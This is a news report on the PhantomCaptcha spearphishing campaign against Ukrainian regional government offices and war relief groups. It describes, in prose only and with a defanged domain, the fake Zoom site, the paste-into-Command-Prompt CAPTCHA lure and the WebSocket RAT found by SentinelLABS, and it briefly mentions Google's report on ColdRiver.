A targeted spearphishing campaign, dubbed PhantomCaptcha, hit Ukrainian regional government offices and critical war relief organizations, including the International Committee of the Red Cross, UNICEF, and various NGOs, in a one-day blitz on October 8.
According to SentinelLABS, the threat intelligence arm of cybersecurity firm SentinelOne, the attack used sophisticated social engineering tactics and malicious infrastructure. The operation employed advanced techniques to deliver a custom WebSocket Remote Access Trojan (RAT) for espionage and data theft.
The attack began with emails impersonating the Ukrainian President’s Office. The messages included PDFs linking to a fake Zoom domain (zoomconference[.]app), leading victims through a seemingly legitimate browser verification process during which a WebSocket client identifier was generated and sent to an attacker-controlled server. If validated, victims were redirected to a genuine password-protected Zoom meeting.
For other users, the site served a fake CAPTCHA challenge in Ukrainian, prompting victims to verify they weren’t robots by copying and pasting a token into the Windows Command Prompt. In reality, this executed a hidden PowerShell command that downloaded a malicious script (cptch), which gathered system data and sent it to a command-and-control (C2) server.
The final payload was a lightweight WebSocket RAT, capable of remote command execution and exfiltration of data using base64-encoded JSON. Despite the campaign lasting just a day, researchers believe it is linked to follow-up operations that used adult-themed Android APKs and fake cloud tools to distribute spyware, especially in the Lviv region.
While SentinelLABS did not formally attribute PhantomCaptcha, the RAT was hosted on Russian infrastructure, and the associated mobile spyware campaign may trace back to Russia or Belarus.
Earlier this week, Google Threat Intelligence Group (GTIG) detailed a similar CAPTCHA abuse in attacks by ColdRiver (also known as Star Blizzard, UNC4057, or Callisto), a hacking group tied to the Russian FSB intelligence service. The researchers said that the threat actor shifted to a new malware family (Norobot, Yesrobot and Mayberobot) after its Lostkeys malware was exposed in May 2025.